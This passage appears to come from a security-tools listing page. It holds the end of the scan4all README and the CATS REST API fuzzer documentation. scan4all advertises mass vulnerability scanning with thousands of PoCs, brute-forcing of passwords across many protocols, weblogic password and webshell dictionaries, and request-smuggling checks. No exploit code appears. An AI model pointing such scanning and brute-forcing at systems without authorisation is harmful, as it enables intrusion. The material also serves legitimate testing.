  • SMB, also detect MS17-010 (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, CVE-2017-0148), SmbGhost (CVE- 2020-0796)
  • Telnet
  • Snmp
  • Wap-wsp (Elasticsearch)
  • RouterOs
  • HTTP BasicAuth
  • Weblogic, enable nuclei through enableNuclei=true at the same time, support T3, IIOP and other detection
  • Tomcat
  • Jboss
  • Winrm(wsman)
  • POP3
• By default, http password intelligent blasting is enabled, and it will be automatically activated when an HTTP password is required, without manual intervention
• Detect whether there is nmap in the system, and enable nmap for fast scanning through priorityNmap=true, which is enabled by default, and the optimized nmap parameters are faster than masscan Disadvantages of using nmap: Is the network bad, because the traffic network packet is too large, which may lead to incomplete results Using nmap additionally requires setting the root password to an environment variable

  export PPSSWWDD=yourRootPswd 

More references: config/doNmapScan.sh By default, naabu is used to complete port scanning -stats=true to view the scanning progress Can I not scan ports?

noScan=true ./scan4all -l list.txt -v
# nmap result default noScan=true 
./scan4all -l nmapRssuilt.xml -v

• Fast 15000+ POC detection capabilities, PoCs include:
  • nuclei POC

  Nuclei Templates Top 10 statistics

281 directories, 3922 files.

• vscan POC
  • vscan POC includes: xray 2.0 300+ POC, go POC, etc.
• scan4all POC

• Support 7000+ web fingerprint scanning, identification:

  • httpx fingerprint
    • vscan fingerprint
    • vscan fingerprint: including eHoleFinger, localFinger, etc.
  • scan4all fingerprint

• Support 146 protocols and 90000+ rule port scanning

  • Depends on protocols and fingerprints supported by nmap

• Fast HTTP sensitive file detection, can customize dictionary

• Landing page detection

• Supports multiple types of input - STDIN/HOST/IP/CIDR/URL/TXT

• Supports multiple output types - JSON/TXT/CSV/STDOUT

• Highly integratable: Configurable unified storage of results to Elasticsearch [strongly recommended]

• Smart SSL Analysis:

  • In-depth analysis, automatically correlate the scanning of domain names in SSL information, such as *.xxx.com, and complete subdomain traversal according to the configuration, and the result will automatically add the target to the scanning list
  • Support to enable *.xx.com subdomain traversal function in smart SSL information, export EnableSubfinder=true, or adjust in the configuration file

• Automatically identify the case of multiple IPs associated with a domain (DNS), and automatically scan the associated multiple IPs

• Smart processing:

  • 1. When the IPs of multiple domain names in the list are the same, merge port scans to improve efficiency
  • 2. Intelligently handle http abnormal pages, and fingerprint calculation and learning

• Automated supply chain identification, analysis and scanning

• Link python3 log4j-scan

  • This version blocks the bug that your target information is passed to the DNS Log Server to avoid exposing vulnerabilities
  • Added the ability to send results to Elasticsearch for batch, touch typing
  • There will be time in the future to implement the golang version how to use?

mkdir ~/MyWork/;cd ~/MyWork/;git clone https://github.com/hktalent/log4j-scan

• Intelligently identify honeypots and skip targets. This function is disabled by default. You can set EnableHoneyportDetection=true to enable

• Highly customizable: allow to define your own dictionary through config/config.json configuration, or control more details, including but not limited to: nuclei, httpx, naabu, etc.

• support HTTP Request Smuggling: CL-TE、TE-CL、TE-TE、CL_CL、BaseErr 

  
  
  

• Support via parameter Cookie='PHPSession=xxxx' ./scan4all -host xxxx.com, compatible with nuclei, httpx, go-poc, x-ray POC, filefuzz, http Smuggling

work process

how to install

download from Releases

go install github.com/hktalent/scan4all@2.6.9
scan4all -h

how to use

• 1. Start Elasticsearch, of course you can use the traditional way to output, results

mkdir -p logs data
docker run --restart=always --ulimit nofile=65536:65536 -p 9200:9200 -p 9300:9300 -d --name es -v $PWD/logs:/usr/share/elasticsearch/logs -v $PWD /config/elasticsearch.yml:/usr/share/elasticsearch/config/elasticsearch.yml -v $PWD/config/jvm.options:/usr/share/elasticsearch/config/jvm.options -v $PWD/data:/ usr/share/elasticsearch/data hktalent/elasticsearch:7.16.2
# Initialize the es index, the result structure of each tool is different, and it is stored separately
./config/initEs.sh

# Search syntax, more query methods, learn Elasticsearch by yourself
http://127.0.0.1:9200/nmap_index/_doc/_search?q=_id:192.168.0.111
where 92.168.0.111 is the target to query

• Please install nmap by yourself before use Using Help

go build
# Precise scan url list UrlPrecise=true
UrlPrecise=true ./scan4all -l xx.txt
# Disable adaptation to nmap and use naabu port to scan its internally defined http-related ports
priorityNmap=false ./scan4all -tp http -list allOut.txt -v

Work Plan

• Integrate web-cache-vulnerability-scanner to realize HTTP smuggling smuggling and cache poisoning detection
• Linkage with metasploit-framework, on the premise that the system has been installed, cooperate with tmux, and complete the linkage with the macos environment as the best practice
• Integrate more fuzzers , such as linking sqlmap
• Integrate chromedp to achieve screenshots of landing pages, detection of front-end landing pages with pure js and js architecture, and corresponding crawlers (sensitive information detection, page crawling)
• Integrate nmap-go to improve execution efficiency, dynamically parse the result stream, and integrate it into the current task waterfall
• Integrate ksubdomain to achieve faster subdomain blasting
• Integrate spider to find more bugs
• Semi-automatic fingerprint learning to improve accuracy; specify fingerprint name, configure

Q & A

• how use Cookie?
• libpcap related question

more see: discussions

Changelog

• 2022-07-20 fix and PR nuclei #2301 并发多实例的bug
• 2022-07-20 add web cache vulnerability scanner
• 2022-07-19 PR nuclei #2308 add dsl function: substr aes_cbc
• 2022-07-19 添加dcom Protocol enumeration network interfaces
• 2022-06-30 嵌入式集成私人版本nuclei-templates 共3744个YAML POC； 1、集成Elasticsearch存储中间结果 2、嵌入整个config目录到程序中
• 2022-06-27 优化模糊匹配，提高正确率、鲁棒性;集成ksubdomain进度
• 2022-06-24 优化指纹算法；增加工作流程图
• 2022-06-23 添加参数ParseSSl，控制默认不深度分析SSL中的DNS信息，默认不对SSL中dns进行扫描；优化：nmap未自动加.exe的bug；优化windows下缓存文件未优化体积的bug
• 2022-06-22 集成11种协议弱口令检测、密码爆破：ftp、mongodb、mssql、mysql、oracle、postgresql、rdp、redis、smb、ssh、telnet，同时优化支持外挂密码字典
• 2022-06-20 集成Subfinder，域名爆破，启动参数导出EnableSubfinder=true，注意启动后很慢； ssl证书中域名信息的自动深度钻取 允许通过 config/config.json 配置定义自己的字典，或设置相关开关
• 2022-06-17 优化一个域名多个IP的情况，所有IP都会被端口扫描，然后按照后续的扫描流程
• 2022-06-15 此版本增加了过去实战中获得的几个weblogic密码字典和webshell字典
• 2022-06-10 完成核的整合，当然包括核模板的整合
• 2022-06-07 添加相似度算法来检测 404
• 2022-06-07 增加http url列表精准扫描参数，根据环境变量UrlPrecise=true开启

CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints

REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!

• Comprehensive: tests are generated automatically based on a large number scenarios and cover every field and header
• Intelligent: tests are generated based on data types and constraints; each Fuzzer have specific expectations depending on the scenario under test
• Highly Configurable: high amount of customization: you can exclude specific Fuzzers, HTTP response codes, provide business context and a lot more
• Self-Healing: as tests are generated, any OpenAPI spec change is picked up automatically
• Simple to Learn: flat learning curve, with intuitive configuration and syntax
• Fast: automatic process for write, run and report tests which covers thousands of scenarios within minutes

Overview

By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data from fully random large Unicode values to well crafted, context dependant values based on the request data types and constraints. Even more, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.

Please check the Slicing Strategies section for making CATS run fast and comprehensive in the same time.

Tutorials on how to use CATS

This is a list of articles with step-by-step guides on how to use CATS:

• Testing the GitHub API with CATS
• How to write self-healing functional tests with no coding effort

Some bugs found by CATS

• hashicorp/vault#13274 | hashicorp/vault#13273
• hashicorp/vault#13225 | hashicorp/vault#13232
• go-gitea/gitea#19397 | go-gitea/gitea#19398
• go-gitea/gitea#19399

Installation

Homebrew

> brew tap endava/tap
> brew install cats

Manual

CATS is bundled both as an executable JAR or a native binary. The native binaries do not need Java installed.

After downloading your OS native binary, you can add it in classpath so that you can execute it as any other command line tool:

sudo cp cats /usr/local/bin/cats

You can also get autocomplete by downloading the cats_autocomplete script and do:

source cats_autocomplete

To get persistent autocomplete, add the above line in ~/.zshrc or ./bashrc, but make sure you put the fully qualified path for the cats_autocomplete script.

You can also check the cats_autocomplete source for alternative setup.

There is no native binary for Windows, but you can use the uberjar version. This requires Java 11+ to be installed.

You can run it as java -jar cats.jar.

Head to the releases page to download the latest versions: https://github.com/Endava/cats/releases.

Build

You can build CATS from sources on you local box. You need Java 11+. Maven is already bundled.

Before running the first build, please make sure you do a ./mvnw clean. CATS uses a fork ok OKHttpClient which will install locally under the 4.9.1-CATS version, so don't worry about overriding the official versions.

You can use the following Maven command to build the project:

./mvnw package -Dquarkus.package.type=uber-jar

cp target/

You will end up with a cats.jar in the target folder. You can run it wih java -jar cats.jar ....

You can also build native images using a GraalVM Java version.

./mvnw package -Pnative

Note: You will need to configure Maven with a Github PAT with read-packages scope to get some dependencies for the build.

Notes on Unit Tests

You may see some ERROR log messages while running the Unit Tests. Those are expected behaviour for testing the negative scenarios of the Fuzzers.

Running CATS

Blackbox mode

Blackbox mode means that CATS doesn't need any specific context. You just need to provide the service URL, the OpenAPI spec and most probably authentication headers.

> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --blackbox

In blackbox mode CATS will only report ERRORs if the received HTTP response code is a 5XX. Any other mismatch between what the Fuzzer expects vs what the service returns (for example service returns 400 and service returns 200) will be ignored.

The blackbox mode is similar to a smoke test. It will quickly tell you if the application has major bugs that must be addressed immediately.

Context mode

The real power of CATS relies on running it in a non-blackbox mode also called context mode. Each Fuzzer has an expected HTTP response code based on the scenario under test and will also check if the response is matching the schema defined in the OpenAPI spec specific to that response code. This will allow you to tweak either your OpenAPI spec or service behaviour in order to create good quality APIs and documentation and also to avoid possible serious bugs.

Running CATS in context mode usually implies providing it a --refData file with resource identifiers specific to the business logic. CATS cannot create data on its own (yet), so it's important that any request field or query param that requires pre-existence of those entities/resources to be created in advance and added to the reference data file.

> cats --contract=openapy.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml

Notes on skipped Tests

You may notice a significant number of tests marked as skipped. CATS will try to apply all Fuzzers to all fields, but this is not always possible. For example the BooleanFieldsFuzzer cannot be applied to String fields. This is why that test attempt will be marked as skipped. It was an intentional decision to also report the skipped tests in order to show that CATS actually tries all the Fuzzers on all the fields/paths/endpoints.

Additionally, CATS support a lot more arguments that allows you to restrict the number of fuzzers, provide timeouts, limit the number of requests per minute and so on.

Understanding how CATS works and reports results

CATS generates tests based on configured Fuzzers. Each Fuzzer has a specific scenario and a specific expected result. The CATS engine will run the scenario, get the result from the service and match it with the Fuzzer expected result. Depending on the matching outcome, CATS will report as follows:

• INFO/SUCCESS is expected and documented behaviour. No need for action.
• WARN is expected but undocumented behaviour or some misalignment between the contract and the service. This will ideally be actioned.
• ERROR is abnormal/unexpected behaviour. This must be actioned.

CATS will iterate through all endpoints, all HTTP methods and all the associated requests bodies and parameters (including multiple combinations when dealing with oneOf/anyOf elements) and fuzz their values considering their defined data type and constraints. The actual fuzzing depends on the specific Fuzzer executed. Please see the list of fuzzers and their behaviour. There are also differences on how the fuzzing works depending on the HTTP method:

• for methods with request bodies like POST, PUT the fuzzing will be applied at the request body data models level
• for methods without request bodies like GET, DELETE the fuzzing will be applied at the URL parameters level

This means that for methods with request bodies (POST,PUT) that have also URL/path parameters, you need to supply the path parameters via urlParams or the referenceData file as failure to do so will result in Illegal character in path at index ... errors.

Interpreting Results

HTML_JS

HTML_JS is the default report produced by CATS. The execution report in placed a folder called cats-report/TIMESTAMP or cats-report depending on the --timestampReports argument. The folder will be created inside the current folder (if it doesn't exist) and for each run a new subfolder will be created with the TIMESTAMP value when the run started. This allows you to have a history of the runs. The report itself is in the index.html file, where you can:

• filter test runs based on the result: All, Success, Warn and Error
• filter based on the Fuzzer so that you can only see the runs for that specific Fuzzer
• see summary with all the tests with their corresponding path against they were run, and the result
• have ability to click on any tests and get details about the Scenario being executed, Expected Result, Actual result as well as request/response details

Along with the summary from index.html each individual test will have a specific TestXXX.html page with more details, as well as a json version of the test which can be latter replayed using > cats replay TestXXX.json.

Understanding the Result Reason values:

• Unexpected Exception - reported as error; this might indicate a possible bug in the service or a corner case that is not handled correctly by CATS
• Not Matching Response Schema - reported as a warn; this indicates that the service returns an expected response code and a response body, but the response body does not match the schema defined in the contract
• Undocumented Response Code - reported as a warn; this indicates that the service returns an expected response code, but the response code is not documented in the contract
• Unexpected Response Code - reported as an error; this indicates a possible bug in the service - the response code is documented, but is not expected for this scenario
• Unexpected Behaviour - reported as an error; this indicates a possible bug in the service - the response code is neither documented nor expected for this scenario
• Not Found - reported as an error in order to force providing more context; this indicates that CATS needs additional business context in order to run successfully - you can do this using the --refData and/or --urlParams arguments

This is the summary page:

And this is what you get when you click on a specific test: 

HTML_ONLY

This format is similar with HTML_JS, but you cannot do any filtering or sorting.

JUNIT

CATS also supports JUNIT output. The output will be a single testsuite that will incorporate all tests grouped by Fuzzer name. As the JUNIT format does not have the concept of warning the following mapping is used:

• CATS error is reported as JUNIT error
• JUNIT failure is not used at all
• CATS warn is reported as JUNIT skipped
• CATS skipped is reported as JUNIT disabled

The JUNIT report is written as junit.xml in the cats-report folder. Individual tests, both as .html and .json will also be created.

Slicing Strategies for Running Cats

CATS has a significant number of Fuzzers. Currently, 89 and growing. Some of the Fuzzers are executing multiple tests for every given field within the request. For example the ControlCharsOnlyInFieldsFuzzer has 63 control chars values that will be tried for each request field. If a request has 15 fields for example, this will result in 1020 tests. Considering that there are additional Fuzzers with the same magnitude of tests being generated, you can easily get to 20k tests being executed on a typical run. This will result in huge reports and long run times (i.e. minutes, rather than seconds).

Below are some recommended strategies on how you can separate the tests in chunks which can be executed as stages in a deployment pipeline, one after the other.

Split by Endpoints

You can use the --paths=PATH argument to run CATS sequentially for each path.

Split by Fuzzer Category

You can use the --checkXXX arguments to run CATS only with specific Fuzzers like: --checkHttp, -checkFields, etc.

Split by Fuzzer Type

You can use various arguments like --fuzzers=Fuzzer1,Fuzzer2 or -skipFuzzers=Fuzzer1,Fuzzer2 to either include or exclude specific Fuzzers. For example, you can run all Fuzzers except for the ControlChars and Whitespaces ones like this: --skipFuzzers=ControlChars,Whitesspaces. This will skip all Fuzzers containing these strings in their name. After, you can create an additional run only with these Fuzzers: --fuzzers=ControlChars,Whitespaces.

These are just some recommendations on how you can split the types of tests cases. Depending on how complex your API is, you might go with a combination of the above or with even more granular splits.

Please note that due to the fact that ControlChars, Emojis and Whitespaces generate huge number of tests even for small OpenAPI contracts, they are disabled by default. You can enable them using the --includeControlChars, --includeWhitespaces and/or --includeEmojis arguments. The recommendation is to run them in separate runs so that you get manageable reports and optimal running times.

Ignoring Specific HTTP Responses

By default, CATS will report WARNs and ERRORs according to the specific behaviour of each Fuzzer. There are cases though when you might want to focus only on critical bugs. You can use the --ignoreResponseXXX arguments to supply a list of response codes, response sizes, word counts, line counts or response body regexes that should be ignored as issues (overriding the Fuzzer behaviour) and report those cases as success instead or WARN or ERROR. For example, if you want CATS to report ERRORs only when there is an Exception or the service returns a 500, you can use this: --ignoreResultCodes="2xx,4xx".

Ignoring Undocumented Response Code Checks

You can also choose to ignore checks done by the Fuzzers. By default, each Fuzzer has an expected response code, based on the scenario under test and will report and WARN the service returns the expected response code, but the response code is not documented inside the contract. You can make CATS ignore the undocumented response code checks (i.e. checking expected response code inside the contract) using the --ignoreResponseCodeUndocumentedCheck argument. CATS with now report these cases as SUCCESS instead of WARN.

Ignoring Response Body Checks

Additionally, you can also choose to ignore the response body checks. By default, on top of checking the expected response code, each Fuzzer will check if the response body matches what is defined in the contract and will report an WARN if not matching. You can make CATS ignore the response body checks using the --ingoreResponseBodyCheck argument. CATS with now report these cases as SUCCESS instead of WARN.

Replaying Tests

When CATS runs, for each test, it will export both an HTML file that will be linked in the final report and individual JSON files. The JSON files can be used to replay that test. When replaying a test (or a list of tests), CATS won't produce any report. The output will be solely available in the console. This is useful when you want to see the exact behaviour of the specific test or attach it in a bug report for example.

The syntax for replaying tests is the following:

> cats replay "Test1,Test233,Test15.json,dir/Test19.json"

Some notes on the above example:

• test names can be separated by comma ,
• if you provide a json extension to a test name, that file will be search as a path i.e. it will search for Test15.json in the current folder and Test19.json in the dir folder
• if you don't provide a json extension to a test name, it will search for that test in the cats-report folder i.e. cats-report/Test1.json and cats-report/Test233.json

Available Commands

To list all available commands, run:

> cats -h

All available subcommands are listed below:

• > cats help or cats -h will list all available options

• > cats list --fuzzers will list all the existing fuzzers, grouped on categories

• > cats list --fieldsFuzzingStrategy will list all the available fields fuzzing strategies

• > cats list --paths --contract=CONTRACT will list all the paths available within the contract

• > cats replay "test1,test2" will replay the given tests test1 and test2

• > cats fuzz will fuzz based on a given request template, rather than an OpenAPI contract

• > cats run will run functional and targeted security tests written in the CATS YAML format

• > cats lint will run OpenAPI contract linters, also called ContractInfoFuzzers

Available arguments

• --contract=LOCATION_OF_THE_CONTRACT supplies the location of the OpenApi or Swagger contract.
• --server=URL supplies the URL of the service implementing the contract.
• --basicauth=USR:PWD supplies a username:password pair, in case the service uses basic auth.
• --fuzzers=LIST_OF_FUZZERS supplies a comma separated list of fuzzers. The supplied list of Fuzzers can be partial names, not full Fuzzer names. CATS which check for all Fuzzers containing the supplied strings. If the argument is not supplied, all fuzzers will be run.
• --log=PACKAGE:LEVEL can configure custom log level for a given package. You can provide a comma separated list of packages and levels. This is helpful when you want to see full HTTP traffic: --log=org.apache.http.wire:debug or suppress CATS logging: --log=com.endava.cats:warn
• --paths=PATH_LIST supplies a comma separated list of OpenApi paths to be tested. If no path is supplied, all paths will be considered.
• --skipPaths=PATH_LIST a comma separated list of paths to ignore. If no path is supplied, no path will be ignored
• --fieldsFuzzingStrategy=STRATEGY specifies which strategy will be used for field fuzzing. Available strategies are ONEBYONE, SIZE and POWERSET. More information on field fuzzing can be found in the sections below.
• --maxFieldsToRemove=NUMBER specifies the maximum number of fields to be removed when using the SIZE fields fuzzing strategy.
• --refData=FILE specifies the file containing static reference data which must be fixed in order to have valid business requests. This is a YAML file. It is explained further in the sections below.
• --headers=FILE specifies a file containing headers that will be added when sending payloads to the endpoints. You can use this option to add oauth/JWT tokens for example.
• --edgeSpacesStrategy=STRATEGY specifies how to expect the server to behave when sending trailing and prefix spaces within fields. Possible values are trimAndValidate and validateAndTrim.
• --sanitizationStrategy=STRATEGY specifies how to expect the server to behave when sending Unicode Control Chars and Unicode Other Symbols within the fields. Possible values are sanitizeAndValidate and validateAndSanitize
• --urlParams A comma separated list of 'name:value' pairs of parameters to be replaced inside the URLs. This is useful when you have static parameters in URLs (like 'version' for example).
• --functionalFuzzerFile a file used by the FunctionalFuzzer that will be used to create user-supplied payloads.
• --skipFuzzers=LIST_OF_FIZZERs a comma separated list of fuzzers that will be skipped for all paths. You can either provide full Fuzzer names (for example: --skippedFuzzers=VeryLargeStringsFuzzer) or partial Fuzzer names (for example: --skipFuzzers=VeryLarge). CATS will check if the Fuzzer names contains the string you provide in the arguments value.
• --skipFields=field1,field2#subField1 a comma separated list of fields that will be skipped by replacement Fuzzers like EmptyStringsInFields, NullValuesInFields, etc.
• --httpMethods=PUT,POST,etc a comma separated list of HTTP methods that will be used to filter which http methods will be executed for each path within the contract
• --securityFuzzerFile A file used by the SecurityFuzzer that will be used to inject special strings in order to exploit possible vulnerabilities
• --printExecutionStatistics If supplied (no value needed), prints a summary of execution times for each endpoint and HTTP method. By default this will print a summary for each endpoint: max, min and average. If you want detailed reports you must supply --printExecutionStatistics=detailed
• --timestampReports If supplied (no value needed), it will output the report still inside the cats-report folder, but in a sub-folder with the current timestamp
• --reportFormat=FORMAT Specifies the format of the CATS report. Supported formats: HTML_ONLY, HTML_JS or JUNIT. You can use HTML_ONLY if you want the report to not contain any Javascript. This is useful in CI environments due to Javascript content security policies. Default is HTML_JS which includes some sorting and filtering capabilities.
• --useExamples If true (default value when not supplied) then CATS will use examples supplied in the OpenAPI contact. If false CATS will rely only on generated values
• --checkFields If supplied (no value needed), it will only run the Field Fuzzers
• --checkHeaders If supplied (no value needed), it will only run the Header Fuzzers
• --checkHttp If supplied (no value needed), it will only run the HTTP Fuzzers
• --includeWhitespaces If supplied (no value needed), it will include the Whitespaces Fuzzers
• --includeEmojis If supplied (no value needed), it will include the Emojis Fuzzers
• --includeControlChars If supplied (no value needed), it will include the ControlChars Fuzzers
• --includeContract If supplied (no value needed), it will include ContractInfoFuzzers
• --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
• --sslKeystorePwd The password of the sslKeystore
• --sslKeyPwd The password of the private key from the sslKeystore
• --proxyHost The proxy server's host name (if running behind proxy)
• --proxyPort The proxy server's port number (if running behind proxy)
• --maxRequestsPerMinute Maximum number of requests per minute; this is useful when APIs have rate limiting implemented; default is 10000
• --connectionTimeout Time period in seconds which CATS should establish a connection with the server; default is 10 seconds
• --writeTimeout Maximum time of inactivity in seconds between two data packets when sending the request to the server; default is 10 seconds
• --readTimeout Maximum time of inactivity in seconds between two data packets when waiting for the server's response; default is 10 seconds
• --dryRun If provided, it will simulate a run of the service with the supplied configuration. The run won't produce a report, but will show how many tests will be generated and run for each OpenAPI endpoint
• --ignoreResponseCodes HTTP_CODES_LIST a comma separated list of HTTP response codes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR. You can use response code families as 2xx, 4xx, etc. If provided, all Contract Fuzzers will be skipped.
• --ignoreResponseSize SIZE_LIST a comma separated list of response sizes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
• --ignoreResponseWords COUNT_LIST a comma separated list of words count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
• --ignoreResponseLines LINES_COUNT a comma separated list of lines count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
• --ignoreResponseRegex a REGEX that will match against the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
• --tests TESTS_LIST a comma separated list of executed tests in JSON format from the cats-report folder. If you supply the list without the .json extension CATS will search the test in the cats-report folder
• --ignoreResponseCodeUndocumentedCheck If supplied (not value needed) it won't check if the response code received from the service matches the value expected by the fuzzer and will return the test result as SUCCESS instead of WARN
• --ignoreResponseBodyCheck If supplied (not value needed) it won't check if the response body received from the service matches the schema supplied inside the contract and will return the test result as SUCCESS instead of WARN
• --blackbox If supplied (no value needed) it will ignore all response codes except for 5XX which will be returned as ERROR. This is similar to --ignoreResponseCodes="2xx,4xx"
• --contentType A custom mime type if the OpenAPI spec uses content type negotiation versioning.
• --outoput The path where the CATS report will be written. Default is cats-report in the current directory
• --skipReportingForIgnoredCodes Skip reporting entirely for the any ignored arguments provided in --ignoreResponseXXX

> cats --contract=my.yml --server=https://locathost:8080 --checkHeaders

This will run CATS against http://localhost:8080 using my.yml as an API spec and will only run the HTTP headers Fuzzers.

Available Fuzzers

To get a list of fuzzers run cats list --fuzzers. A list of all available fuzzers will be returned, along with a short description for each.

There are multiple categories of Fuzzers available:

• Field Fuzzers which target request body fields or path parameters
• Header Fuzzers which target HTTP headers
• HTTP Fuzzers which target just the interaction with the service (without fuzzing fields or headers)

Additional checks which are not actually using any fuzzing, but leverage the CATS internal model of running the tests as Fuzzers:

• ContractInfo Fuzzers which checks the contract for API good practices
• Special Fuzzers a special category which need further configuration and are focused on more complex activities like functional flow, security testing or supplying your own request templates, rather than OpenAPI specs

Field Fuzzers

CATS has currently 42 registered Field Fuzzers:

• BooleanFieldsFuzzer - iterate through each Boolean field and send random strings in the targeted field
• DecimalFieldsLeftBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the left side in the targeted field
• DecimalFieldsRightBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the right side in the targeted field
• DecimalValuesInIntegerFieldsFuzzer - iterate through each Integer field and send requests with decimal values in the targeted field
• EmptyStringValuesInFieldsFuzzer - iterate through each field and send requests with empty String values in the targeted field
• ExtremeNegativeValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the lowest value possible (-999999999999999999999999999999999999999999.99999999999 for no format, -3.4028235E38 for float and -1.7976931348623157E308 for double) in the targeted field
• ExtremeNegativeValueIntegerFieldsFuzzer - iterate through each Integer field and send requests with the lowest value possible (-9223372036854775808 for int32 and -18446744073709551616 for int64) in the targeted field
• ExtremePositiveValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the highest value possible (999999999999999999999999999999999999999999.99999999999 for no format, 3.4028235E38 for float and 1.7976931348623157E308 for double) in the targeted field
• ExtremePositiveValueInIntegerFieldsFuzzer - iterate through each Integer field and send requests with the highest value possible (9223372036854775807 for int32 and 18446744073709551614 for int64) in the targeted field
• IntegerFieldsLeftBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the left side in the targeted field
• IntegerFieldsRightBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the right side in the targeted field
• InvalidValuesInEnumsFieldsFuzzer - iterate through each ENUM field and send invalid values
• LeadingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode whitespaces and invisible separators prefixing the current value in the targeted field
• LeadingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode control chars prefixing the current value in the targeted field
• LeadingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with single code points emojis
• LeadingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with multi code points emojis
• MaxLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have maxLength declared and send requests with values matching the maxLength size/value in the targeted field
• MaximumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have maximum declared and send requests with values matching the maximum size/value in the targeted field
• MinLengthExactValuesInStringFieldsFuzzer - iterate through each String fields that have minLength declared and send requests with values matching the minLength size/value in the targeted field
• MinimumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer fields that have minimum declared and send requests with values matching the minimum size/value in the targeted field
• NewFieldsFuzzer - send a 'happy' flow request and add a new field inside the request called 'catsFuzzyField'
• NullValuesInFieldsFuzzer - iterate through each field and send requests with null values in the targeted field
• OnlyControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send values with control chars only
• OnlyWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send values with unicode separators only
• OnlySingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with single code point emojis only
• OnlyMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with multi code point emojis only
• RemoveFieldsFuzzer - iterate through each request fields and remove certain fields according to the supplied 'fieldsFuzzingStrategy'
• StringFieldsLeftBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the left side in the targeted field
• StringFieldsRightBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the right side in the targeted field
• StringFormatAlmostValidValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are almost valid (i.e. email@yhoo. for email, 888.1.1. for ip, etc) in the targeted field
• StringFormatTotallyWrongValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are totally wrong (i.e. abcd for email, 1244. for ip, etc) in the targeted field
• StringsInNumericFieldsFuzzer - iterate through each Integer (int, long) and Number field (float, double) and send requests having the fuzz string value in the targeted field
• TrailingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode whitespaces and invisible separators in the targeted field
• TrailingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with trailing with Unicode control chars in the targeted field
• TrailingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with single code point emojis
• TrailingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with multi code point emojis
• VeryLargeStringsFuzzer - iterate through each String field and send requests with very large values (40000 characters) in the targeted field
• WithinControlCharsInFieldsSanitizeValidateFuzzer - iterate through each field and send values containing unicode control chars
• WithinSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing single code point emojis
• WithinMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing multi code point emojis
• ZalgoTextInStringFieldsValidateSanitizeFuzzer - iterate through each field and send values containing zalgo text

You can run only these Fuzzers by supplying the --checkFields argument.

Header Fuzzers

CATS has currently 28 registered Header Fuzzers:

• AbugidasCharsInHeadersFuzzer - iterate through each header and send requests with abugidas chars in the targeted header
• CheckSecurityHeadersFuzzer - check all responses for good practices around Security related headers like: [{name=Cache-Control, value=no-store}, {name=X-XSS-Protection, value=1; mode=block}, {name=X-Content-Type-Options, value=nosniff}, {name=X-Frame-Options, value=DENY}]
• DummyAcceptHeadersFuzzer - send a request with a dummy Accept header and expect to get 406 code
• DummyContentTypeHeadersFuzzer - send a request with a dummy Content-Type header and expect to get 415 code
• DuplicateHeaderFuzzer - send a 'happy' flow request and duplicate an existing header
• EmptyStringValuesInHeadersFuzzer - iterate through each header and send requests with empty String values in the targeted header
• ExtraHeaderFuzzer - send a 'happy' flow request and add an extra field inside the request called 'Cats-Fuzzy-Header'
• LargeValuesInHeadersFuzzer - iterate through each header and send requests with large values in the targeted header
• LeadingControlCharsInHeadersFuzzer - iterate through each header and prefix values with control chars
• LeadingWhitespacesInHeadersFuzzer - iterate through each header and prefix value with unicode separators
• LeadingSpacesInHeadersFuzzer - iterate through each header and send requests with spaces prefixing the value in the targeted header
• RemoveHeadersFuzzer - iterate through each header and remove different combinations of them
• OnlyControlCharsInHeadersFuzzer - iterate through each header and replace value with control chars
• OnlySpacesInHeadersFuzzer - iterate through each header and replace value with spaces
• OnlyWhitespacesInHeadersFuzzer - iterate through each header and replace value with unicode separators
• TrailingSpacesInHeadersFuzzer - iterate through each header and send requests with trailing spaces in the targeted header \
• TrailingControlCharsInHeadersFuzzer - iterate through each header and trail values with control chars
